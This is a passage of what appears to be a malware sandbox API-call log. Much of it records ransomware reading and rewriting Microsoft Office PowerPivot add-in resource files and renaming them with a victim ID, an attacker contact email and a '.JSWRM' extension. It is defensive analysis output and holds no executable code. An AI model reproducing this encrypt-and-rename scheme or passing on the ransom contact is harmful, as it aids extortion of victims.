lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.727] CloseHandle (hObject=0x338) returned 1 [0127.727] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.727] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.733] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.733] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.735] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1049\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1049\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1049\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1049\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.737] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.737] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.738] CloseHandle (hObject=0x338) returned 1 [0127.739] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.739] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0127.745] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.745] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0127.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1050\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1050\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1050\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1050\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.748] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.748] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.815] CloseHandle (hObject=0x338) returned 1 [0127.815] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.815] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0127.822] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.822] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0127.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1051\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1051\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1051\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1051\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.825] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.826] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.827] CloseHandle (hObject=0x338) returned 1 [0127.827] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.828] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0127.834] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.834] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0127.835] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1053\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1053\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1053\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1053\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.838] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.838] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.839] CloseHandle (hObject=0x338) returned 1 [0127.840] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.840] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11660, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11660, lpOverlapped=0x0) returned 1 [0127.846] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.846] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11660, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11660, lpOverlapped=0x0) returned 1 [0127.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1054\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1054\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1054\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1054\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.849] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.849] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.851] CloseHandle (hObject=0x338) returned 1 [0127.851] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.851] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0127.867] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.867] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0127.868] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1055\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1055\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1055\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1055\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.870] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.870] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.872] CloseHandle (hObject=0x338) returned 1 [0127.872] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.872] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0127.879] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.879] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0127.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1057\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1057\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1057\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1057\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.883] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.883] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.884] CloseHandle (hObject=0x338) returned 1 [0127.885] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.885] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.893] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.893] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1058\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1058\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1058\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1058\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.899] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.899] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.900] CloseHandle (hObject=0x338) returned 1 [0127.901] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.901] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0127.935] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.936] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0127.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1060\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1060\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1060\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1060\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.955] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.955] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.956] CloseHandle (hObject=0x338) returned 1 [0127.957] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.957] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11660, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11660, lpOverlapped=0x0) returned 1 [0127.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.963] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11660, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11660, lpOverlapped=0x0) returned 1 [0127.964] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1061\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1061\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1061\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1061\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.967] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.967] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.968] CloseHandle (hObject=0x338) returned 1 [0127.968] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.969] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0127.975] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.975] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0127.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1062\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1062\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1062\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1062\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.978] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.978] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.980] CloseHandle (hObject=0x338) returned 1 [0127.980] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.980] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0128.022] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.022] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0128.024] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1063\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1063\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1063\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1063\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.027] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.027] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.028] CloseHandle (hObject=0x338) returned 1 [0128.029] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.029] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0128.042] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.042] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0128.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1066\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1066\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1066\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1066\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.049] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.049] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.051] CloseHandle (hObject=0x338) returned 1 [0128.051] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 